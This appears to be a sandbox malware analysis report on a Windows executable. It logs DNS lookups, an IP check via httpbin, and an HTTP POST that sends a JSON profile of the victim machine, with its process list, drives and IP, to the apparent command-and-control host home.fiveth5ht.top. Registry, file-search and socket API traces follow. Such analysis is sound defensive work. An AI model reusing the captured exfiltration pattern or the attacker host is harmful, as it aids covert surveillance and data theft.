                                                          Dec 27, 2024 15:12:27.536998987 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537004948 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537049055 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537055016 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537066936 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537108898 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537115097 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537199974 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537205935 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537277937 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537283897 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537344933 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537396908 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537477970 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537483931 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537633896 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537640095 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537693977 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537699938 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537714005 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537719011 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537816048 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537822008 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537970066 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538011074 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538067102 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538072109 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538111925 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538117886 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538232088 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538237095 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538342953 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538348913 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538361073 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538454056 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538546085 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538587093 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538706064 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538717031 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538811922 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538817883 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541177988 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541184902 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541295052 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541301012 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541434050 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541520119 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541526079 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541634083 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541640043 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541645050 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541774035 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541779995 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541868925 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541874886 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542010069 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542016029 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542027950 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542043924 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542049885 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542119980 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542125940 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542218924 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542247057 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542336941 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542354107 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542465925 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542470932 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542574883 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542581081 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542601109 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542607069 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542623043 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542639971 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542682886 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542732954 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542787075 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542857885 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542947054 CET80497315.101.3.217192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 15:12:21.331129074 CET | 192.168.2.4 | 1.1.1.1 | 0xd87c | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:12:21.331202984 CET | 192.168.2.4 | 1.1.1.1 | 0x4a57 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 27, 2024 15:12:25.476310968 CET | 192.168.2.4 | 1.1.1.1 | 0x9249 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:12:25.476473093 CET | 192.168.2.4 | 1.1.1.1 | 0x8126 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 27, 2024 15:12:59.730788946 CET | 192.168.2.4 | 1.1.1.1 | 0xb348 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:12:59.730859041 CET | 192.168.2.4 | 1.1.1.1 | 0xc66e | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 15:12:21.629281044 CET | 1.1.1.1 | 192.168.2.4 | 0xd87c | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:12:21.629281044 CET | 1.1.1.1 | 192.168.2.4 | 0xd87c | No error (0) | httpbin.org | | 3.218.7.103 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:12:25.614955902 CET | 1.1.1.1 | 192.168.2.4 | 0x9249 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 15:12:59.873262882 CET | 1.1.1.1 | 192.168.2.4 | 0xb348 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
                                                          • httpbin.org
                                                          • home.fiveth5ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 5.101.3.217 | 80 | 7252 | C:\Users\user\Desktop\f7qbEfJl0B.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 15:12:26.007304907 CET | 12360 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 442896
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317137350", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 27, 2024 15:12:59.126312971 CET | 194 | IN | HTTP/1.0 504 Gateway Time-out
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 5.101.3.217 | 80 | 7252 | C:\Users\user\Desktop\f7qbEfJl0B.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 15:12:59.994853020 CET | 269 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 128
                                                          Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
Dec 27, 2024 15:13:03.199084044 CET | 309 | IN | HTTP/1.1 502 Bad Gateway
                                                          Server: nginx/1.22.1
                                                          Date: Fri, 27 Dec 2024 14:13:02 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 34.226.108.155 | 443 | 7252 | C:\Users\user\Desktop\f7qbEfJl0B.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 14:12:23 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                          Host: httpbin.org
                                                          Accept: */*
2024-12-27 14:12:23 UTC | 224 | IN | HTTP/1.1 200 OK
                                                          Date: Fri, 27 Dec 2024 14:12:23 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 31
                                                          Connection: close
                                                          Server: gunicorn/19.9.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: true
2024-12-27 14:12:23 UTC | 31 | IN | Data Ascii: { "origin": "8.46.123.189"}



                                                          Target ID:0
                                                          Start time:09:12:17
                                                          Start date:27/12/2024
                                                          Path:C:\Users\user\Desktop\f7qbEfJl0B.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\f7qbEfJl0B.exe"
                                                          Imagebase:0xf90000
                                                          File size:4'487'168 bytes
                                                          MD5 hash:01FBECB34B5AC1C9C3336C64817F1637
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:4.1%
                                                            Dynamic/Decrypted Code Coverage:22.3%
                                                            Signature Coverage:11%
                                                            Total number of Nodes:663
                                                            Total number of Limit Nodes:88
f975e0 65723->65792 65725 fca6d9 65728 fca709 65725->65728 65738 fca713 65725->65738 65807 fa2a00 _open 65725->65807 65726->65725 65727 fcef30 _open 65726->65727 65730 fca63a 65727->65730 65731 f978b0 2 API calls 65728->65731 65728->65738 65735 fca641 65730->65735 65739 fca69b 65730->65739 65731->65738 65732 fc8bfc 65732->65698 65732->65699 65732->65702 65732->65718 65733 fca7e5 65737 fca811 setsockopt 65733->65737 65741 fca87c 65733->65741 65754 fca8ee 65733->65754 65735->65733 65809 fd4fd0 _open 65735->65809 65737->65741 65747 fca83b 65737->65747 65738->65732 65808 fd50a0 _open 65738->65808 65805 fad090 _open 65739->65805 65741->65754 65812 fcb1e0 _open 65741->65812 65742 fca6c9 65806 fd4f40 _open 65742->65806 65744 fcaf33 65804 ff67e0 ioctlsocket 65744->65804 65747->65741 65810 fad090 _open 65747->65810 65748 fcaf56 65748->65725 65750 fcaf5d 65748->65750 65750->65738 65753 fca150 2 API calls 65750->65753 65751 fca86d 65811 fd4fd0 _open 65751->65811 65753->65738 65754->65725 65754->65744 65756 fcacb8 65754->65756 65757 fcae32 65754->65757 65759 fcabb9 65754->65759 65780 fcabe1 65754->65780 65755 fcaf03 65755->65744 65821 fd4fd0 _open 65755->65821 65756->65725 65756->65759 65764 fcacdc 65756->65764 65757->65759 65820 fd4fd0 _open 65757->65820 65761 fcad45 65759->65761 65763 fcade6 65759->65763 65759->65780 65814 fc6be0 14 API calls 65759->65814 65760 fcb056 65823 fad090 _open 65760->65823 65762 fcad5f 65761->65762 65761->65763 65815 fe20d0 _open 65762->65815 65818 fad090 _open 65763->65818 65813 fad090 _open 65764->65813 65768 fcb07b 65824 fd4f40 _open 65768->65824 65771 fcad7b 65775 fcadb7 65771->65775 65816 fd4fd0 _open 65771->65816 65817 fe3030 _open 65775->65817 65776 fcad01 65819 fd4f40 _open 65776->65819 65780->65725 65780->65755 65780->65760 65822 fd4fd0 _open 65780->65822 65781->65714 65782->65709 65783->65718 65784->65702 65785->65716 65786->65697 65787->65701 65789 f978d7 65788->65789 65790 f978c5 65788->65790 65789->65718 65828 f972a0 _open 65790->65828 
65793 f975ef 65792->65793 65794 f97607 socket 65792->65794 65793->65794 65797 f97601 65793->65797 65798 f97643 65793->65798 65795 f9762b 65794->65795 65796 f9763a 65794->65796 65825 f972a0 _open 65795->65825 65796->65726 65797->65794 65826 f972a0 _open 65798->65826 65801 f97654 65827 f9cb20 _open 65801->65827 65803 f97674 65803->65726 65804->65748 65805->65742 65806->65725 65807->65728 65808->65732 65809->65733 65810->65751 65811->65741 65812->65754 65813->65776 65814->65761 65815->65771 65816->65775 65817->65780 65818->65776 65819->65725 65820->65759 65821->65744 65822->65780 65823->65768 65824->65725 65825->65796 65826->65801 65827->65803 65828->65789 65829 f931d7 65832 f931f4 65829->65832 65830 f93200 65831 f932dc CloseHandle 65831->65830 65832->65830 65832->65831 65833 f92f17 65841 f92f2c 65833->65841 65834 f931d3 65835 f92fb3 RegOpenKeyExA 65835->65841 65836 f9315c RegEnumKeyExA 65837 f931b2 RegCloseKey 65836->65837 65836->65841 65837->65841 65838 f93046 RegOpenKeyExA 65839 f93089 RegQueryValueExA 65838->65839 65838->65841 65840 f9313b RegCloseKey 65839->65840 65839->65841 65840->65841 65841->65834 65841->65835 65841->65836 65841->65838 65841->65840 65842 f913c9 65846 f91160 65842->65846 65845 f913a1 65846->65845 65847 13193e0 65846->65847 65857 1318a20 _open fgetc isxdigit 65846->65857 65853 1319400 65847->65853 65856 13193f3 65847->65856 65848 1319688 65849 13196c7 65848->65849 65848->65856 65858 1319280 vfprintf 65848->65858 65859 1319220 vfprintf 65849->65859 65852 13196df 65852->65846 65853->65848 65853->65849 65854 1319280 vfprintf 65853->65854 65855 1319220 vfprintf 65853->65855 65853->65856 65854->65853 65855->65853 65856->65846 65857->65846 65858->65848 65859->65852 65325 141f250 65326 141f282 65325->65326 65327 141f28e 65326->65327 65330 1318f70 65326->65330 65329 141f297 65337 1318e90 _open 65330->65337 65332 1318f82 65333 1318e90 _open 65332->65333 65334 1318fa2 65333->65334 65335 1318f70 _open 65334->65335 65336 1318fb8 65335->65336 65336->65329 
65338 1318eba 65337->65338 65338->65332 65860 1417830 65861 141785a 65860->65861 65862 1417866 65861->65862 65863 1318f70 _open 65861->65863 65864 141786f 65863->65864 65870 13212c0 65864->65870 65867 14178a6 65868 1318f70 _open 65869 14178af 65868->65869 65871 13212cc 65870->65871 65874 131e050 65871->65874 65873 13212fa 65873->65867 65873->65868 65885 131e09d 65874->65885 65898 131e503 65874->65898 65876 131feb6 isxdigit 65876->65898 65877 131e243 65882 131e18e 65877->65882 65899 131df60 fgetc 65877->65899 65878 131df60 fgetc 65878->65898 65879 131eb52 65880 131eb63 65879->65880 65881 131e81a 65879->65881 65883 131f0d5 65880->65883 65897 131eb7a 65880->65897 65890 131e850 65881->65890 65881->65897 65882->65873 65904 131df60 fgetc 65883->65904 65884 131df60 fgetc 65884->65885 65885->65877 65885->65882 65885->65884 65892 131e388 65885->65892 65885->65898 65889 131e6b9 65896 131e6e4 65889->65896 65889->65897 65889->65898 65890->65882 65901 131df60 fgetc 65890->65901 65892->65879 65892->65882 65892->65889 65892->65898 65903 131df60 fgetc 65892->65903 65894 131f0e8 65894->65882 65894->65898 65905 131df60 fgetc 65894->65905 65896->65882 65900 131df60 fgetc 65896->65900 65897->65882 65897->65898 65902 131df60 fgetc 65897->65902 65898->65876 65898->65878 65898->65882 65899->65877 65900->65898 65901->65898 65902->65898 65903->65892 65904->65894 65905->65894 65906 131b180 Sleep 65339 fad5e0 65340 fad652 WSAStartup 65339->65340 65341 fad5f0 65339->65341 65340->65341 65342 fad664 65340->65342 65344 fad67c 65341->65344 65346 fad690 _open 65341->65346 65345 fad5fa 65346->65345 65347 6e4047f Process32FirstW 65348 6e404b0 65347->65348 65907 fcb3c0 65908 fcb3ee 65907->65908 65909 fcb3cb 65907->65909 65911 f976a0 2 API calls 65909->65911 65913 fc9290 65909->65913 65910 fcb3ea 65911->65910 65914 f976a0 2 API calls 65913->65914 65915 fc92e5 65914->65915 65916 fc93c3 65915->65916 65918 fc92f3 65915->65918 65921 fc9392 65916->65921 65927 fad090 _open 65916->65927 65917 fc93be 
65917->65910 65918->65921 65922 fc9335 WSAIoctl 65918->65922 65920 fc93f7 65928 fd4f40 _open 65920->65928 65921->65917 65929 fd50a0 _open 65921->65929 65922->65921 65925 fc9366 65922->65925 65925->65921 65926 fc9371 setsockopt 65925->65926 65926->65921 65927->65920 65928->65921 65929->65917 65930 fce400 65931 fce412 65930->65931 65936 fce459 65930->65936 65932 fce422 65931->65932 65954 fe3030 _open 65931->65954 65955 ff09d0 _open 65932->65955 65935 fce4a8 65936->65935 65939 fce495 65936->65939 65942 fcb5a0 65936->65942 65937 fce42b 65956 fc68b0 6 API calls 65937->65956 65939->65935 65941 fcb5a0 _open 65939->65941 65941->65935 65943 fcb5d2 65942->65943 65944 fcb5c0 65942->65944 65943->65939 65944->65943 65945 fcb713 65944->65945 65950 fcb626 65944->65950 65958 fd4f40 _open 65945->65958 65947 fcb65a 65947->65943 65948 fcb72b 65947->65948 65949 fcb737 65947->65949 65948->65943 65959 fd50a0 _open 65948->65959 65949->65943 65960 fd50a0 _open 65949->65960 65950->65943 65950->65947 65950->65948 65950->65949 65957 fd50a0 _open 65950->65957 65954->65932 65955->65937 65956->65936 65957->65950 65958->65943 65959->65943 65960->65943 65961 fcb400 65962 fcb40b 65961->65962 65963 fcb425 65961->65963 65966 f97770 65962->65966 65964 fcb421 65967 f97790 65966->65967 65968 f977b6 recv 65966->65968 65967->65968 65969 f97799 65967->65969 65974 f977a3 65968->65974 65976 f977d4 65968->65976 65971 f977db 65969->65971 65969->65974 65978 f972a0 _open 65971->65978 65973 f977ec 65979 f9cb20 _open 65973->65979 65977 f972a0 _open 65974->65977 65976->65964 65977->65976 65978->65973 65979->65976 65980 fd0700 65988 fd0719 65980->65988 65995 fd099d 65980->65995 65983 fd09b5 65983->65995 66005 fd50a0 _open 65983->66005 65985 fd09f6 66006 f975a0 65985->66006 65986 fd0a35 66010 fd4f40 _open 65986->66010 65988->65983 65988->65985 65988->65986 65988->65995 65998 f97310 _open 65988->65998 65999 fcb8e0 _open 65988->65999 66000 fff570 _open 65988->66000 66001 fbeb30 _open 65988->66001 66002 ff13a0 _open 
65988->66002 66003 10139a0 _open 65988->66003 66004 fbeae0 _open 65988->66004 65996 f975a0 _open 65996->65995 65998->65988 65999->65988 66000->65988 66001->65988 66002->65988 66003->65988 66004->65988 66005->65995 66007 f975aa 66006->66007 66009 f975d1 66006->66009 66007->66009 66011 f972a0 _open 66007->66011 66009->65996 66010->65995 66011->66009 66012 fcf6c3 66015 fcf6e3 66012->66015 66019 fcf7b9 66012->66019 66013 fcf72e 66014 fcf7f4 66013->66014 66022 fcf743 66013->66022 66016 fcf800 66014->66016 66032 fd0c80 _open 66014->66032 66015->66013 66028 fd50a0 _open 66015->66028 66019->66015 66019->66016 66031 fd4fd0 _open 66019->66031 66020 fcff5b 66027 fd0034 66020->66027 66033 fd50a0 _open 66020->66033 66022->66016 66025 fd50a0 _open 66022->66025 66029 f9fa50 _open 66022->66029 66030 fd0d30 _open 66022->66030 66025->66022 66028->66013 66029->66022 66030->66022 66031->66015 66032->66020 66033->66027

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            APIs
                                                            • GetSystemInfo.KERNELBASE ref: 00F92579
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 00F925CC
                                                            • GetDriveTypeA.KERNELBASE ref: 00F92647
                                                            • GetDiskFreeSpaceExA.KERNELBASE ref: 00F9267E
                                                            • KiUserCallbackDispatcher.NTDLL ref: 00F927E2
                                                            • FindFirstFileW.KERNELBASE ref: 00F928F8
                                                            • FindNextFileW.KERNELBASE ref: 00F9291F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                            • String ID: @$`
                                                            • API String ID: 3271271169-3318628307
                                                            • Opcode ID: fbe080cfcf0f636aeea54cc493103a0cb535213c8387e154f9bc26ba896acdc9
                                                            • Instruction ID: 8ac0cd48be03c4e2e1706f41a2df3a9fcb48a9c9ac15b9227496fe77f09ee97e
                                                            • Opcode Fuzzy Hash: fbe080cfcf0f636aeea54cc493103a0cb535213c8387e154f9bc26ba896acdc9
                                                            • Instruction Fuzzy Hash: E6D1CAB490430A9FCB50EF69C99469EBBF0BF54354F00896EE898D7354E7349A84CF52

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                            • String ID: 0
                                                            • API String ID: 2406880114-4108050209
                                                            • Opcode ID: e2714b9dcbb688f0ea5ab3b49b2e210164000872d0ae80cb7044a67f00074983
                                                            • Instruction ID: f671e5c7a46af4c85a31e8239c2724984d85e2328bf3966d045ed288ab039e85
                                                            • Opcode Fuzzy Hash: e2714b9dcbb688f0ea5ab3b49b2e210164000872d0ae80cb7044a67f00074983
                                                            • Instruction Fuzzy Hash: 1EE1E7B490530A9FDB50EFA8D98469EBBF4BF54314F40886AE888DB354E734D984DF42

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00FA0712
                                                            • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00FA09DD
                                                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00FA09FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: EventSelect$EnumEventsNetwork
                                                            • String ID: multi.c
                                                            • API String ID: 2170980988-214371023

                                                            Control-flow Graph
                                                            • Function at f97770 (node and edge listing omitted); calls seen in the graph: recv, plus internal subroutines f972a0, f9cb20 and 1318c50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: recv
                                                            • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                            • API String ID: 1507349165-640788491

                                                            Control-flow Graph
                                                            • Function at fa6fa0 (node and edge listing omitted); calls seen in the graph: select, __WSAFDIsSet, plus internal subroutine fad7f0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:

                                                            Control-flow Graph
                                                            • Function at 105b180 (node and edge listing omitted); calls seen in the graph: getsockname, plus internal subroutines 105af30, 105b060, 105b020, 1318b00, 105b590, 105b660, 105b770 and 105b870
                                                            APIs
                                                            • getsockname.WS2_32(-00000020,-00000020,?), ref: 0105B2B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: ares__sortaddrinfo.c$cur != NULL
                                                            • API String ID: 3358416759-2430778319
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            APIs
                                                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0104A499
                                                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0104A4FB
                                                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0104A531
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0104AA19
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0104AA4C
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0104AA97
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0104AAE9
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0104AB30
                                                            • RegCloseKey.KERNELBASE(?), ref: 0104AB6A
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0104AB82
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0104AC46
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0104AD0A
                                                            • RegEnumKeyExA.KERNELBASE ref: 0104AD8D
                                                            • RegCloseKey.KERNELBASE(?), ref: 0104ADD9
